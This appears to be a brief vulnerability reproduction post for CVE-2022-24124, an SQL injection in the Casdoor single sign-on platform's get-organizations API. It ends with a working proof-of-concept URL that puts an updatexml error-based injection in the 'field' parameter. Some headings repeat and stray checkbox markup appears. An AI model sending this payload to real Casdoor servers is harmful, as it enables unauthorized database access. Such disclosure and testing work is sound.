Casdoor Get Organizations Sql Injection Vulnerability Cve 2022 24124
Casdoor Get Organizations Sql Injection Vulnerability Cve 2022 24124
Casdoor get-organizations SQL injection vulnerability CVE-2022-24124
Vulnerability Description
Casdoor is a UI-first centralized authentication/single sign-on (SSO) platform based on OAuth 2.0 / OIDC. Simply put, Casdoor can help you solve the problems of user management. You don’t need to develop a series of functions related to user authentication, such as user login registration. You only need a few steps, simple configuration, and cooperate with your main application to fully host your user module, which is simple and worry-free and powerful.
Vulnerability Impact
Casdoor </a-checkbox>
Network surveying and mapping
“Casdoor”</a-checkbox>
Vulnerability reappears
Login page
Verify POC
1
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)
This post is licensed under CC BY 4.0 by the author.